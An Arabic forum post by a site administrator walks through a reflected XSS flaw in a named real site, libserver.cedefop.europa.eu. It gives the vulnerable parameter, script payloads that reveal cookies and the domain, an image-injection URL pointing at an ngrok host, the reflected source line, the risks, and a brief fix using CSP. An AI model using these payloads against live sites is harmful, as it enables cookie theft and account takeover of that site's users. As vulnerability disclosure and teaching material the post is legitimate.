أهلاً ومرحبا بكل أعضاء وزوار مجتمع أكتب كود .. يمكنك تسجيل عضوية فى منتديات أكتب كود .. لتتمكن من عرض الموقع بدون أعلانات ( التسجيل مجاناً )
  1. المدير العام

    المدير العام أدارة موقع أكتب كود

    شرح طريقة اكتشاف ثغرة Reflected XSS في موقع europa.eu
    ماهي ثغرة Cross-site Scripting (XSS) - Reflected ؟
    تحدث ثغرة XSS عندما يسمح موقع الويب بتنفيذ اكواد جافاسكربت في متصفح المستخدم الذي يزور الموقع , لذالك يقوم المهاجم باستغلال هاذا الخطأ لتنفيذ اكواد خبيثة في متصفح الضحية وسرقة ملفات Cookies وغيرها من البيانات ...

    خطوات اكتشاف ثغرة Reflected XSS في موقع europa.eu :
    1. نقوم بفتح الرابط التالي :
    كود:
     https://libserver.cedefop.europa.eu/browse_catalogue.aspx?item=
    2. نقوم بحقن السكربت في الباراميتر item :
    كود:
     <script>alert(document.cookie)</script>
    3. سيتم تنفيذ السكربت في الموقع المصاب

    POC1​
    كود:
     https://libserver.cedefop.europa.eu/browse_catalogue.aspx?item=<script>alert(document.domain)</script>

    Source Code​
    كود:
     Line 451 : <span>Click on a <script>alert(document.domain)</script> below to see the associated items.</span>

    [​IMG]

    [​IMG]

    POC2​
    حقن صورة في الموقع :
    كود:
    https://libserver.cedefop.europa.eu/browse_catalogue.aspx?item=<img src="https://111697rt098e.ngrok.io/Hacked2.jpg" width="700px" height="420px">
    [​IMG]

    خطر الثغرة :
    يستطيع المهاجم استغلال الثغرة وسرقة ملفات cookies من الضحية والاستيلاء على الحساب , وتنفيذ اكواد جافاسكربت للتجسس على الضحية مثل keylogger, وتغيير شكل الصفحة والتعديل عليها واضافة صور وفيديو ويمكن تحويل الضحية الى مواقع اخرى ...

    كيف يتم اصلاح الثغرة :
    نقوم باستخدام Content Security Policy (CSP) لمنع تنفيذ اي سكربت ضار

    المراجع : https://portswigger.net/web-security/cross-site-scripting
     
جاري تحميل الصفحة...
المشاركات المتشابهة - شرح طريقة اكتشاف
  1. المدير العام
    الردود:
    0
    المشاهدات:
    52
  2. المدير العام
    الردود:
    0
    المشاهدات:
    34
  3. المدير العام
    الردود:
    0
    المشاهدات:
    38
  4. المدير العام
    الردود:
    0
    المشاهدات:
    34
  5. المدير العام
    الردود:
    0
    المشاهدات:
    31

مشاركة هذه الصفحة